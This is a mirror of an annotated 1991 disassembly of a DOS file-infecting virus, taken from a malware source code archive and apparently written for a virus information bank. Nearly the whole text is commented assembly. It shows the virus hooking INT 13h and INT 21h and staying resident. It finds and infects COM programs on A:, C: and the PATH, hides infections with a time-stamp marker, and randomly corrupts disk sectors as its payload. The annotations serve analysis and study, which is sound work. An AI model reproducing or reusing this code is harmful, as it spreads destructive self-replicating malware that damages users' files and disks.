mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-12 05:15:28 +00:00
906 lines
28 KiB
Plaintext
906 lines
28 KiB
Plaintext
|
;-------------------------------------------------
|
||
|
; Virus
|
||
|
;
|
||
|
; dissasembled by Andrzej Kadlof July 1991
|
||
|
;
|
||
|
; (C) Polish section of Virus Information Bank
|
||
|
;------------------------------------------------
|
||
|
|
||
|
0100 E97801 JMP 027B
|
||
|
|
||
|
; old INT 13h vector
|
||
|
|
||
|
0103 7A0F
|
||
|
0105 7000
|
||
|
|
||
|
;====================
|
||
|
; INT 13h handler
|
||
|
|
||
|
0107 9C PUSHF
|
||
|
0108 50 PUSH AX
|
||
|
0109 53 PUSH BX
|
||
|
010A 51 PUSH CX
|
||
|
010B 52 PUSH DX
|
||
|
010C 1E PUSH DS
|
||
|
010D 06 PUSH ES
|
||
|
010E 57 PUSH DI
|
||
|
|
||
|
010F 0E PUSH CS
|
||
|
0110 1F POP DS
|
||
|
0111 50 PUSH AX
|
||
|
0112 B000 MOV AL,00
|
||
|
0114 3D0002 CMP AX,0200 ; request: read sectors?
|
||
|
0117 58 POP AX ; restore oryginal function number
|
||
|
0118 7571 JNZ 018B ; no, exit
|
||
|
|
||
|
011A 80F900 CMP CL,00 ; first sector number (illegal)
|
||
|
011D 7518 JNZ 0137 ; not zero, not virus question
|
||
|
|
||
|
011F 81FF3412 CMP DI,1234 ; question from new copy of virus
|
||
|
0123 7512 JNZ 0137 ; no
|
||
|
|
||
|
; prepare answer for the question from next virsus copy
|
||
|
|
||
|
0125 5F POP DI
|
||
|
0126 BF2143 MOV DI,4321 ; answer: I'm here!
|
||
|
0129 58 POP AX
|
||
|
012A 58 POP AX
|
||
|
012B A19901 MOV AX,[0199] ; old INT 21h
|
||
|
012E 50 PUSH AX
|
||
|
012F A19B01 MOV AX,[019B]
|
||
|
0132 50 PUSH AX
|
||
|
0133 57 PUSH DI
|
||
|
0134 EB55 JMP 018B ; exit
|
||
|
0136 90 NOP
|
||
|
|
||
|
; check cylinder number, if not 4x + 2 or 4x + 3 then exit (x arbitrary)
|
||
|
|
||
|
0137 51 PUSH CX
|
||
|
0138 81E100FC AND CX,FC00
|
||
|
013C 80FD00 CMP CH,00
|
||
|
013F 59 POP CX
|
||
|
0140 7449 JZ 018B ; exit
|
||
|
|
||
|
; check time condition
|
||
|
|
||
|
0142 51 PUSH CX
|
||
|
0143 52 PUSH DX
|
||
|
0144 B80000 MOV AX,0000
|
||
|
0147 FB STI
|
||
|
0148 CD1A INT 1A ; read the clock
|
||
|
|
||
|
014A 81E2FF0F AND DX,0FFF ; low word of tick count since reset
|
||
|
014E 83FA00 CMP DX,+00 ; about 3.7 min
|
||
|
0151 5A POP DX
|
||
|
0152 59 POP CX
|
||
|
0153 7536 JNZ 018B ; exit
|
||
|
|
||
|
;<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
|
||
|
;
|
||
|
; DESTRUCTION! change one byte on the sector on the next track
|
||
|
;
|
||
|
;<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
|
||
|
|
||
|
0155 9C PUSHF
|
||
|
0156 0E PUSH CS ; segment of return address
|
||
|
0157 B86601 MOV AX,0166 ; offset of return address
|
||
|
015A 50 PUSH AX
|
||
|
015B B80102 MOV AX,0201 ; read 1 sector
|
||
|
015E 80C501 ADD CH,01 ; next track
|
||
|
0161 2EFF2E0301 JMP DWORD PTR CS:[0103] ; CALL FAR INT 13h
|
||
|
|
||
|
0166 7223 JB 018B ; exit
|
||
|
|
||
|
; get random number between 0 and 1FFh (minimal buffer size)
|
||
|
|
||
|
0168 51 PUSH CX
|
||
|
0169 52 PUSH DX
|
||
|
016A B80000 MOV AX,0000
|
||
|
016D FB STI
|
||
|
016E CD1A INT 1A ; read the clock
|
||
|
|
||
|
0170 81E2FF01 AND DX,01FF ; low word of tick count since reset
|
||
|
|
||
|
; change one byte inside buffer
|
||
|
|
||
|
0174 53 PUSH BX ; offset of buffer
|
||
|
0175 03DA ADD BX,DX ; random byte in buffer
|
||
|
0177 26880F MOV ES:[BX],CL ; undefined value (first sector)
|
||
|
017A 5B POP BX ; restore buffer address
|
||
|
|
||
|
; write buffer back to disk
|
||
|
|
||
|
017B 5A POP DX ; disk/head
|
||
|
017C 59 POP CX ; track/sector
|
||
|
017D 9C PUSHF
|
||
|
017E 0E PUSH CS ; segment of return address
|
||
|
017F B88B01 MOV AX,018B ; offset of return address
|
||
|
0182 50 PUSH AX
|
||
|
0183 B80103 MOV AX,0301 ; write 1 sector
|
||
|
0186 2EFF2E0301 JMP DWORD PTR CS:[0103] ; CALL FAR INT 13h
|
||
|
|
||
|
; exit to old INT 13h
|
||
|
|
||
|
018B 5F POP DI
|
||
|
018C 07 POP ES
|
||
|
018D 1F POP DS
|
||
|
018E 5A POP DX
|
||
|
018F 59 POP CX
|
||
|
0190 5B POP BX
|
||
|
0191 58 POP AX
|
||
|
0192 9D POPF
|
||
|
0193 2EFF2E0301 JMP DWORD PTR CS:[0103] ; INT 13h
|
||
|
0198 90 NOP
|
||
|
|
||
|
;---------------
|
||
|
; working area
|
||
|
|
||
|
; old INT 21h vector
|
||
|
|
||
|
0199 9E10
|
||
|
019B 1801
|
||
|
|
||
|
019D 26 0D ; segment of environment block
|
||
|
019F 80 00 ; address of command line
|
||
|
01A1 2B 0D ; CS
|
||
|
01A3 5C 00 ; first FCB in PSP
|
||
|
01A5 2B 0D ; CS
|
||
|
01A7 6C 00 ; second FCB in PSP
|
||
|
01A9 2B 0D ; CS
|
||
|
01AB CF 01 ; runtime SP
|
||
|
|
||
|
01AD 2B 0D ; old SS, CS
|
||
|
01AF 02 19 ; old SP
|
||
|
|
||
|
;------------
|
||
|
; local stack
|
||
|
|
||
|
01B1 9D01
|
||
|
01B3 857F
|
||
|
01B5 FF58
|
||
|
01B7 2B0D
|
||
|
01B9 2F01
|
||
|
01BB E37F
|
||
|
01BD D300
|
||
|
01BF 0001
|
||
|
02C1 2C00
|
||
|
01C3 260D
|
||
|
02C5 2B0D
|
||
|
01C7 430C
|
||
|
01C9 2903
|
||
|
01CB 2B0D
|
||
|
01CD 02F2
|
||
|
|
||
|
; end of local stack
|
||
|
;-------------------
|
||
|
|
||
|
01CF 90 NOP
|
||
|
01D0 90 NOP
|
||
|
|
||
|
;=====================
|
||
|
; INT 21h handler
|
||
|
|
||
|
01D1 9C PUSHF
|
||
|
01D2 56 PUSH SI
|
||
|
01D3 50 PUSH AX
|
||
|
01D4 53 PUSH BX
|
||
|
01D5 51 PUSH CX
|
||
|
01D6 52 PUSH DX
|
||
|
01D7 1E PUSH DS
|
||
|
01D8 06 PUSH ES
|
||
|
01D9 57 PUSH DI
|
||
|
01DA 80FC4B CMP AH,4B ; load and execute
|
||
|
01DD 7555 JNZ 0234 ; exit
|
||
|
|
||
|
01DF 1E PUSH DS
|
||
|
01E0 52 PUSH DX
|
||
|
01E1 0E PUSH CS
|
||
|
01E2 1F POP DS
|
||
|
01E3 C70698036906 MOV WORD PTR [0398],0669 ; virus length
|
||
|
01E9 E8E203 CALL 05CE ; intercept INT 24h and prepare local DTA
|
||
|
|
||
|
01EC 5F POP DI
|
||
|
01ED 07 POP ES
|
||
|
01EE 06 PUSH ES
|
||
|
01EF 57 PUSH DI
|
||
|
01F0 B80000 MOV AX,0000
|
||
|
01F3 B98000 MOV CX,0080
|
||
|
01F6 F2AE REPNZ SCASB
|
||
|
01F8 83F900 CMP CX,+00
|
||
|
01FB 7432 JZ 022F
|
||
|
|
||
|
01FD 4F DEC DI
|
||
|
01FE B05C MOV AL,5C ; '\'
|
||
|
0200 4F DEC DI
|
||
|
0201 AE SCASB
|
||
|
0202 75F9 JNZ 01FD
|
||
|
|
||
|
0204 57 PUSH DI
|
||
|
0205 59 POP CX
|
||
|
0206 5E POP SI
|
||
|
0207 1F POP DS
|
||
|
0208 0E PUSH CS
|
||
|
0209 07 POP ES
|
||
|
020A BF6906 MOV DI,0669 ; buffer (area behind virus code)
|
||
|
020D AC LODSB
|
||
|
020E AA STOSB
|
||
|
020F 3BF1 CMP SI,CX
|
||
|
0211 75FA JNZ 020D
|
||
|
|
||
|
0213 0E PUSH CS
|
||
|
0214 1F POP DS
|
||
|
0215 893EA203 MOV [03A2],DI
|
||
|
0219 BEAC03 MOV SI,03AC
|
||
|
021C B90600 MOV CX,0006
|
||
|
021F AC LODSB
|
||
|
0220 AA STOSB
|
||
|
0221 E2FC LOOP 021F
|
||
|
|
||
|
0223 BA6906 MOV DX,0669
|
||
|
0226 E87302 CALL 049C ; find and infect one COM file
|
||
|
|
||
|
0229 E8D703 CALL 0603 ; restore DTA and INT 24h
|
||
|
|
||
|
022C EB06 JMP 0234 ; exit
|
||
|
022E 90 NOP
|
||
|
|
||
|
022F 58 POP AX
|
||
|
0230 58 POP AX
|
||
|
0231 E8CF03 CALL 0603 ; restore DTA and INT 24h
|
||
|
|
||
|
; exit to old INT 21h
|
||
|
|
||
|
0234 90 NOP
|
||
|
0235 5F POP DI
|
||
|
0236 07 POP ES
|
||
|
0237 1F POP DS
|
||
|
0238 5A POP DX
|
||
|
0239 59 POP CX
|
||
|
023A 5B POP BX
|
||
|
023B 58 POP AX
|
||
|
023C 5E POP SI
|
||
|
023D 9D POPF
|
||
|
023E 2EFF2E9901 JMP DWORD PTR CS:[0199]
|
||
|
0243 90 NOP
|
||
|
|
||
|
;------------------------
|
||
|
; prepare Load & Execute
|
||
|
|
||
|
0244 8CC0 MOV AX,ES
|
||
|
0246 8BE8 MOV BP,AX
|
||
|
0248 8BD7 MOV DX,DI ; offset of victim name
|
||
|
024A 8CC8 MOV AX,CS
|
||
|
024C 8EC0 MOV ES,AX ; segment of victim name
|
||
|
024E BB9D01 MOV BX,019D ; run parameters
|
||
|
0251 06 PUSH ES
|
||
|
0252 53 PUSH BX
|
||
|
0253 8CC8 MOV AX,CS ; block segment
|
||
|
0255 8EC0 MOV ES,AX
|
||
|
0257 BBD300 MOV BX,00D3 ; block size in paragraphs
|
||
|
025A B44A MOV AH,4A ; resize memory block
|
||
|
|
||
|
025C CD21 INT 21
|
||
|
|
||
|
; free environment block
|
||
|
|
||
|
025E BF2C00 MOV DI,002C ; address of environment block in PSP
|
||
|
0261 8E05 MOV ES,[DI] ; segment of environment
|
||
|
0263 B80049 MOV AX,4900 ; free memory block
|
||
|
0266 CD21 INT 21
|
||
|
|
||
|
0268 5B POP BX
|
||
|
0269 07 POP ES
|
||
|
026A 58 POP AX
|
||
|
026B 8C0EAD01 MOV [01AD],CS
|
||
|
026F 8E16AD01 MOV SS,[01AD]
|
||
|
0273 8B26AB01 MOV SP,[01AB]
|
||
|
0277 8EDD MOV DS,BP
|
||
|
0279 50 PUSH AX
|
||
|
027A C3 RET
|
||
|
|
||
|
;===========================
|
||
|
; virus entry point
|
||
|
|
||
|
; look for resident part of virus in RAM
|
||
|
; on system with 3 floppy drives this test may hang the computer
|
||
|
; (unspecified I/O buffer BX)
|
||
|
|
||
|
027B B203 MOV DL,03 ; third floppy drive
|
||
|
027D B600 MOV DH,00 ; head 0
|
||
|
027F B100 MOV CL,00 ; first sector 0
|
||
|
0281 B500 MOV CH,00 ; track
|
||
|
0283 B80102 MOV AX,0201 ; read 1 sector
|
||
|
0286 BF3412 MOV DI,1234 ; is already in memory?
|
||
|
0289 CD13 INT 13
|
||
|
|
||
|
028B 81FF2143 CMP DI,4321 ; expected answer
|
||
|
028F 7503 JNZ 0294 ; memory is clear
|
||
|
|
||
|
0291 E92601 JMP 03BA ; exit
|
||
|
|
||
|
; intercept INT 21h and INT 13h
|
||
|
|
||
|
0294 B82135 MOV AX,3521 ; get INT 21h
|
||
|
0297 CD21 INT 21
|
||
|
|
||
|
0299 891E9901 MOV [0199],BX
|
||
|
029D 8C069B01 MOV [019B],ES
|
||
|
02A1 BAD101 MOV DX,01D1
|
||
|
02A4 B82125 MOV AX,2521 ; set INT 21h
|
||
|
02A7 CD21 INT 21
|
||
|
|
||
|
02A9 B435 MOV AH,35 ; get INT 13h
|
||
|
02AB B013 MOV AL,13
|
||
|
02AD CD21 INT 21
|
||
|
|
||
|
02AF 891E0301 MOV [0103],BX
|
||
|
02B3 8C060501 MOV [0105],ES
|
||
|
02B7 B425 MOV AH,25 ; set INT 13h
|
||
|
02B9 B013 MOV AL,13
|
||
|
02BB BA0701 MOV DX,0107
|
||
|
02BE CD21 INT 21
|
||
|
|
||
|
; prepare Load & Execute
|
||
|
|
||
|
02C0 BF2C00 MOV DI,002C ; address of environment in PSP
|
||
|
02C3 8B05 MOV AX,[DI]
|
||
|
02C5 A39D01 MOV [019D],AX
|
||
|
02C8 8C0EA101 MOV [01A1],CS
|
||
|
02CC C7069F018000 MOV WORD PTR [019F],0080 ; command line
|
||
|
02D2 8C0EA501 MOV [01A5],CS
|
||
|
02D6 C706A3015C00 MOV WORD PTR [01A3],005C ; first FCB in PSP
|
||
|
02DC 8C0EA901 MOV [01A9],CS
|
||
|
02E0 C706A7016C00 MOV WORD PTR [01A7],006C ; second FCB
|
||
|
|
||
|
; look for program name (DOS 3.x or higher)
|
||
|
|
||
|
02E6 FC CLD
|
||
|
02E7 BF2C00 MOV DI,002C ; segment of environment block
|
||
|
02EA 8E05 MOV ES,[DI]
|
||
|
02EC BF0000 MOV DI,0000 ; start of environment
|
||
|
|
||
|
02EF B80000 MOV AX,0000 ; end of block marker
|
||
|
02F2 B90080 MOV CX,8000 ; maxim block size
|
||
|
02F5 2BCF SUB CX,DI ; end of block
|
||
|
02F7 7230 JB 0329 ; not found
|
||
|
|
||
|
02F9 F2AE REPNZ SCASB
|
||
|
02FB B80000 MOV AX,0000
|
||
|
02FE AE SCASB
|
||
|
02FF 75EE JNZ 02EF
|
||
|
|
||
|
0301 B80100 MOV AX,0001
|
||
|
0304 AE SCASB
|
||
|
0305 7522 JNZ 0329
|
||
|
|
||
|
0307 B80000 MOV AX,0000
|
||
|
030A AE SCASB
|
||
|
030B 751C JNZ 0329
|
||
|
|
||
|
030D E834FF CALL 0244 ; prepare Load & Execute
|
||
|
|
||
|
0310 B8004B MOV AX,4B00 ; load and execute
|
||
|
0313 E86F00 CALL 0385 ; INT 21h
|
||
|
|
||
|
; clear environment block
|
||
|
|
||
|
0316 0E PUSH CS
|
||
|
0317 1F POP DS
|
||
|
0318 BF2C00 MOV DI,002C ; environment
|
||
|
031B B80000 MOV AX,0000 ; end of block marker
|
||
|
031E 8905 MOV [DI],AX ; start of block
|
||
|
0320 BAD300 MOV DX,00D3 ; size of virus block in paragraphs
|
||
|
0323 B80031 MOV AX,3100 ; terminate and state resident
|
||
|
0326 E85C00 CALL 0385 ; far call to INT 21h
|
||
|
|
||
|
; victim name not found (DOS < 3.0)
|
||
|
; execute command >C:\COMMAND.COM /P
|
||
|
|
||
|
0329 E818FF CALL 0244 ; prepare Load & Execute
|
||
|
032C 0E PUSH CS
|
||
|
032D 1F POP DS
|
||
|
032E BA7603 MOV DX,0376 ; 'c:\command.com',0
|
||
|
0331 57 PUSH DI
|
||
|
0332 BF8000 MOV DI,0080 ; command line
|
||
|
0335 C705022F MOV WORD PTR [DI],2F02 ; 2, '/'
|
||
|
0339 C74502500D MOV WORD PTR [DI+02],0D50 ; 'P', CR
|
||
|
033E 5F POP DI
|
||
|
033F B8004B MOV AX,4B00 ; load and execute
|
||
|
0342 E84000 CALL 0385 ; far call to INT 21h
|
||
|
|
||
|
0345 B86300 MOV AX,0063 ; 'c'
|
||
|
0348 57 PUSH DI
|
||
|
0349 BF7603 MOV DI,0376 ; 'c:\command.com',0
|
||
|
034C 8805 MOV [DI],AL
|
||
|
034E 5F POP DI
|
||
|
034F B8004B MOV AX,4B00 ; load and execute
|
||
|
0352 E83000 CALL 0385 ; far call to INT 21h
|
||
|
|
||
|
; restore INT 13h
|
||
|
|
||
|
0355 B81325 MOV AX,2513 ; set INT 13h
|
||
|
0358 8B160301 MOV DX,[0103]
|
||
|
035C FF360501 PUSH [0105]
|
||
|
0360 1F POP DS
|
||
|
0361 CD21 INT 21
|
||
|
|
||
|
; restore INT 13h
|
||
|
|
||
|
0363 B82125 MOV AX,2521
|
||
|
0366 8B169901 MOV DX,[0199]
|
||
|
036A FF369B01 PUSH [019B]
|
||
|
036E 1F POP DS
|
||
|
036F CD21 INT 21
|
||
|
|
||
|
0371 0E PUSH CS
|
||
|
0372 1F POP DS
|
||
|
0373 EB45 JMP 03BA
|
||
|
0375 90 NOP
|
||
|
|
||
|
0376 63 3A 5C 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 00 ; c:\COMMAND.COM
|
||
|
|
||
|
;---------------------
|
||
|
; FAR CALL to INT 21h
|
||
|
|
||
|
0385 2E8F069603 POP CS:[0396] ; offset of caller
|
||
|
038A 9C PUSHF ; prepare jump to INT 21h
|
||
|
038B 0E PUSH CS ; segment of return address
|
||
|
038C 2EFF369603 PUSH CS:[0396] ; offset of return addres
|
||
|
0391 2EFF2E9901 JMP DWORD PTR CS:[0199] ; CALL FAR INT 13h
|
||
|
|
||
|
;--------------
|
||
|
; working area
|
||
|
|
||
|
0396 96 05 ; place for offset of return address
|
||
|
0398 60 D2 ; length of victim
|
||
|
039A 80 00 ; old DTA offset
|
||
|
039C C2 0A ; old DTA segment
|
||
|
039E 00 00 ; counter ?
|
||
|
03A0 00 00 ; DS
|
||
|
03A2 FA CC ; working, end of path
|
||
|
03A4 50 41 54 48 3D ; PATH=
|
||
|
03A9 61 3A 5C 2A 2E 63 6F 6D 00 ; a:\*.com, 0
|
||
|
|
||
|
; old INT 24h
|
||
|
|
||
|
03B2 49 01 ; offset
|
||
|
03B4 48 09 ; segment
|
||
|
|
||
|
;==================
|
||
|
; INT 24h handler
|
||
|
|
||
|
03B6 90 NOP
|
||
|
03B7 B003 MOV AL,03
|
||
|
03B9 CF IRET
|
||
|
|
||
|
;---------------------------------
|
||
|
; virus alredy resident, continue
|
||
|
|
||
|
03BA 06 PUSH ES
|
||
|
03BB 1E PUSH DS
|
||
|
03BC 0E PUSH CS
|
||
|
03BD 1F POP DS
|
||
|
03BE 8F069901 POP [0199] ; old INT 21h offset
|
||
|
03C2 8F069B01 POP [019B] ; old INT 21h segment
|
||
|
03C6 E80502 CALL 05CE ; prepare INT 24h and DTA
|
||
|
|
||
|
03C9 BEA903 MOV SI,03A9 ; address of 'a:\*.com, 0'
|
||
|
03CC 8B3E9803 MOV DI,[0398] ; buffer outside viruse code
|
||
|
03D0 B90900 MOV CX,0009 ; number of bytes
|
||
|
03D3 AC LODSB
|
||
|
03D4 AA STOSB
|
||
|
03D5 E2FC LOOP 03D3
|
||
|
|
||
|
03D7 8B3E9803 MOV DI,[0398] ; buffer
|
||
|
03DB 83C703 ADD DI,+03
|
||
|
03DE 893EA203 MOV [03A2],DI
|
||
|
03E2 8B3E9803 MOV DI,[0398]
|
||
|
03E6 B86100 MOV AX,0061 ; drive 'a'
|
||
|
03E9 8805 MOV [DI],AL ; patch 'a:\*.com', 0
|
||
|
03EB 8BD7 MOV DX,DI ; buffer
|
||
|
03ED E8AC00 CALL 049C ; find and infect one COM program
|
||
|
|
||
|
03F0 BEA903 MOV SI,03A9
|
||
|
03F3 8B3E9803 MOV DI,[0398]
|
||
|
03F7 B90900 MOV CX,0009
|
||
|
03FA AC LODSB
|
||
|
03FB AA STOSB
|
||
|
03FC E2FC LOOP 03FA
|
||
|
|
||
|
03FE 8B3E9803 MOV DI,[0398]
|
||
|
0402 B86300 MOV AX,0063 ; drive 'c'
|
||
|
0405 8805 MOV [DI],AL ; patch 'a:\*.com', 0
|
||
|
0407 8BD7 MOV DX,DI
|
||
|
0409 E89000 CALL 049C ; find and infect one COM program
|
||
|
|
||
|
040C 7203 JB 0411
|
||
|
|
||
|
040E E91302 JMP 0624
|
||
|
|
||
|
0411 BF2C00 MOV DI,002C ; environment
|
||
|
0414 8E05 MOV ES,[DI]
|
||
|
0416 BF0000 MOV DI,0000
|
||
|
0419 BEA403 MOV SI,03A4 ; 'PATH='
|
||
|
041C 46 INC SI
|
||
|
041D B85000 MOV AX,0050 ; 'P'
|
||
|
0420 B90080 MOV CX,8000 ; max block size
|
||
|
0423 2BCF SUB CX,DI
|
||
|
0425 7303 JAE 042A
|
||
|
|
||
|
0427 E9FA01 JMP 0624 ; not found
|
||
|
|
||
|
042A F2AE REPNZ SCASB
|
||
|
042C B90400 MOV CX,0004
|
||
|
042F AC LODSB
|
||
|
0430 AE SCASB
|
||
|
0431 75E6 JNZ 0419
|
||
|
|
||
|
0433 E2FA LOOP 042F
|
||
|
|
||
|
0435 8B369803 MOV SI,[0398]
|
||
|
0439 56 PUSH SI
|
||
|
043A 57 PUSH DI
|
||
|
043B 5E POP SI
|
||
|
043C 5F POP DI
|
||
|
043D 06 PUSH ES
|
||
|
043E 0E PUSH CS
|
||
|
043F 07 POP ES
|
||
|
0440 1F POP DS
|
||
|
0441 AC LODSB
|
||
|
0442 AA STOSB
|
||
|
0443 3C3B CMP AL,3B ; ';' end of path marker
|
||
|
0445 7409 JZ 0450
|
||
|
|
||
|
0447 3C00 CMP AL,00 ; end of block marker
|
||
|
0449 7402 JZ 044D
|
||
|
|
||
|
044B EBF4 JMP 0441 ; end of block
|
||
|
|
||
|
044D BE0000 MOV SI,0000
|
||
|
0450 1E PUSH DS
|
||
|
0451 0E PUSH CS
|
||
|
0452 1F POP DS
|
||
|
0453 8F06A003 POP [03A0]
|
||
|
0457 89369E03 MOV [039E],SI
|
||
|
045B 4F DEC DI
|
||
|
045C 4F DEC DI
|
||
|
|
||
|
; check for last character '\', add if necessary
|
||
|
|
||
|
045D B05C MOV AL,5C ; '\'
|
||
|
045F 3805 CMP [DI],AL
|
||
|
0461 7403 JZ 0466
|
||
|
|
||
|
0463 47 INC DI
|
||
|
0464 8805 MOV [DI],AL
|
||
|
0466 47 INC DI
|
||
|
|
||
|
; form new path ....\*.com, 0
|
||
|
|
||
|
0467 BEAC03 MOV SI,03AC ; *.com
|
||
|
046A 893EA203 MOV [03A2],DI
|
||
|
046E B90600 MOV CX,0006 ; length
|
||
|
|
||
|
0471 AC LODSB
|
||
|
0472 AA STOSB
|
||
|
0473 E2FC LOOP 0471
|
||
|
|
||
|
0475 A19803 MOV AX,[0398] ; buffer
|
||
|
0478 8BD0 MOV DX,AX
|
||
|
047A E81F00 CALL 049C ; find and infect COM file
|
||
|
|
||
|
047D 7203 JB 0482
|
||
|
|
||
|
047F E9A201 JMP 0624
|
||
|
|
||
|
0482 833E9E0300 CMP WORD PTR [039E],+00
|
||
|
0487 7503 JNZ 048C
|
||
|
|
||
|
0489 E99801 JMP 0624
|
||
|
|
||
|
048C A19803 MOV AX,[0398]
|
||
|
048F 8BF8 MOV DI,AX
|
||
|
0491 8B369E03 MOV SI,[039E]
|
||
|
0495 FF36A003 PUSH [03A0]
|
||
|
0499 1F POP DS
|
||
|
049A EBA5 JMP 0441
|
||
|
|
||
|
;---------------------------------
|
||
|
; find and infect one COM program
|
||
|
|
||
|
049C 0E PUSH CS
|
||
|
049D 07 POP ES
|
||
|
049E B8004E MOV AX,4E00 ; find first
|
||
|
04A1 B90300 MOV CX,0003 ; hiden, read only
|
||
|
04A4 E8DEFE CALL 0385 ; far call to INT 21h
|
||
|
|
||
|
04A7 730C JAE 04B5
|
||
|
|
||
|
04A9 C3 RET
|
||
|
|
||
|
04AA B44F MOV AH,4F ; find next
|
||
|
04AC B90300 MOV CX,0003 ; hiden, read only
|
||
|
04AF E8D3FE CALL 0385 ; far call to INT 21h
|
||
|
|
||
|
04B2 7301 JAE 04B5
|
||
|
|
||
|
04B4 C3 RET
|
||
|
|
||
|
; start infection
|
||
|
|
||
|
04B5 8B3E9803 MOV DI,[0398] ; buffer
|
||
|
04B9 81C78000 ADD DI,0080 ; set DI to DTA
|
||
|
04BD 83C71A ADD DI,+1A ; file length
|
||
|
04C0 8B05 MOV AX,[DI]
|
||
|
04C2 2D0010 SUB AX,1000 ; minimum victim size
|
||
|
04C5 7215 JB 04DC ; file too small, find next
|
||
|
|
||
|
04C7 8B05 MOV AX,[DI] ; file size
|
||
|
04C9 2DFFEF SUB AX,EFFF ; maximum file size
|
||
|
04CC 730E JAE 04DC ; file too big, find next
|
||
|
|
||
|
04CE 83EF04 SUB DI,+04 ; file time stamp
|
||
|
04D1 8B05 MOV AX,[DI]
|
||
|
04D3 241F AND AL,1F ; extract seconds
|
||
|
04D5 3C18 CMP AL,18 ; 48 seconds
|
||
|
04D7 7403 JZ 04DC ; infected, find next
|
||
|
|
||
|
04D9 EB03 JMP 04DE ; continue
|
||
|
04DB 90 NOP
|
||
|
|
||
|
04DC EBCC JMP 04AA ; find next
|
||
|
|
||
|
; copy file name to buffer
|
||
|
|
||
|
04DE 83C708 ADD DI,+08
|
||
|
04E1 8BF7 MOV SI,DI
|
||
|
04E3 8B3EA203 MOV DI,[03A2]
|
||
|
04E7 AC LODSB
|
||
|
04E8 AA STOSB
|
||
|
04E9 3C00 CMP AL,00
|
||
|
04EB 75FA JNZ 04E7
|
||
|
|
||
|
; find new file length
|
||
|
|
||
|
04ED 8B3E9803 MOV DI,[0398]
|
||
|
04F1 81C78000 ADD DI,0080 ; set DI to local DTA
|
||
|
04F5 83C71A ADD DI,+1A ; file length
|
||
|
04F8 8B05 MOV AX,[DI]
|
||
|
04FA 056906 ADD AX,0669 ; new file length
|
||
|
04FD FF369803 PUSH [0398]
|
||
|
0501 50 PUSH AX
|
||
|
|
||
|
; clear flag Read Only
|
||
|
|
||
|
0502 8B169803 MOV DX,[0398]
|
||
|
0506 B80043 MOV AX,4300 ; get attributes
|
||
|
0509 E879FE CALL 0385 ; far call to INT 21h
|
||
|
|
||
|
050C 890EC805 MOV [05C8],CX ; store old attributes
|
||
|
0510 81E1FEFF AND CX,FFFE ; clear read only flag
|
||
|
0514 B80143 MOV AX,4301 ; set attributes
|
||
|
0517 E86BFE CALL 0385 ; far call to INT 21h
|
||
|
|
||
|
051A 7233 JB 054F ; error, exit
|
||
|
|
||
|
; open file for read/write
|
||
|
|
||
|
051C B8023D MOV AX,3D02 ; open file for read/write
|
||
|
051F E863FE CALL 0385 ; far call to INT 21h
|
||
|
|
||
|
0522 722B JB 054F ; error, exit
|
||
|
|
||
|
; set 48 second in file time stamp
|
||
|
|
||
|
0524 8BD8 MOV BX,AX ; hundle
|
||
|
0526 B80057 MOV AX,5700 ; get time stamp
|
||
|
0529 E859FE CALL 0385 ; far call to INT 21h
|
||
|
|
||
|
052C 81E1E0FF AND CX,FFE0 ; clear seconds
|
||
|
0530 83C118 ADD CX,+18 ; set to 48
|
||
|
0533 890ECA05 MOV [05CA],CX ; store for later
|
||
|
0537 8916CC05 MOV [05CC],DX
|
||
|
|
||
|
; copy first 669h bytes of file to the end
|
||
|
|
||
|
; read beginnig of file (669h bytes)
|
||
|
|
||
|
053B B96906 MOV CX,0669 ; virus length
|
||
|
053E 81E90001 SUB CX,0100 ; size of PSP
|
||
|
0542 8B169803 MOV DX,[0398]
|
||
|
0546 81C20001 ADD DX,0100 ; buffer
|
||
|
054A B43F MOV AH,3F ; read file
|
||
|
054C E836FE CALL 0385 ; far call to INT 21h
|
||
|
|
||
|
054F 7271 JB 05C2 ; error, exit
|
||
|
|
||
|
; move file ptr back to BOF
|
||
|
|
||
|
0551 8BFA MOV DI,DX
|
||
|
0553 BA0000 MOV DX,0000
|
||
|
0556 B90000 MOV CX,0000
|
||
|
0559 B80242 MOV AX,4202 ; move file ptr to EOF
|
||
|
055C E826FE CALL 0385 ; far call to INT 21h
|
||
|
|
||
|
055F 7261 JB 05C2 ; error, exit
|
||
|
|
||
|
; vrite virus code to file
|
||
|
|
||
|
0561 8BD7 MOV DX,DI
|
||
|
0563 B96906 MOV CX,0669 ; virus length
|
||
|
0566 81E90001 SUB CX,0100
|
||
|
056A B440 MOV AH,40 ; write file
|
||
|
056C E816FE CALL 0385 ; far call to INT 21h
|
||
|
|
||
|
056F 7251 JB 05C2 ; error, exit
|
||
|
|
||
|
; move file ptr to EOF
|
||
|
|
||
|
0571 BA0000 MOV DX,0000
|
||
|
0574 B90000 MOV CX,0000
|
||
|
0577 B80042 MOV AX,4200 ; move file ptr to BOF
|
||
|
057A E808FE CALL 0385 ; far call to INT 21h
|
||
|
|
||
|
057D 7243 JB 05C2
|
||
|
|
||
|
; write to file its beginning block
|
||
|
|
||
|
057F 8F069803 POP [0398]
|
||
|
0583 FF369803 PUSH [0398]
|
||
|
0587 B96906 MOV CX,0669 ; end of virus code
|
||
|
058A 81E90001 SUB CX,0100 ; size of PSP
|
||
|
058E BA0001 MOV DX,0100 ; from buffer
|
||
|
0591 B440 MOV AH,40 ; write file
|
||
|
0593 E8EFFD CALL 0385 ; far call to INT 21h
|
||
|
|
||
|
0596 722A JB 05C2
|
||
|
; error, exit
|
||
|
|
||
|
; restore file time stamp
|
||
|
|
||
|
0598 8B0ECA05 MOV CX,[05CA] ; restore time stamp
|
||
|
059C 8B16CC05 MOV DX,[05CC] ; restore date stamp
|
||
|
05A0 B80157 MOV AX,5701 ; set file time stamp
|
||
|
05A3 E8DFFD CALL 0385 ; far call to INT 21h
|
||
|
|
||
|
; close file
|
||
|
|
||
|
05A6 B43E MOV AH,3E ; close file
|
||
|
05A8 E8DAFD CALL 0385 ; far call to INT 21h
|
||
|
|
||
|
; restore file attributes
|
||
|
|
||
|
05AB 8F069803 POP [0398]
|
||
|
05AF 8F069803 POP [0398]
|
||
|
05B3 8B169803 MOV DX,[0398]
|
||
|
05B7 8B0EC805 MOV CX,[05C8] ; retore file attributes
|
||
|
05BB B80143 MOV AX,4301 ; set file attributes
|
||
|
05BE E8C4FD CALL 0385 ; far call to INT 21h
|
||
|
|
||
|
05C1 C3 RET
|
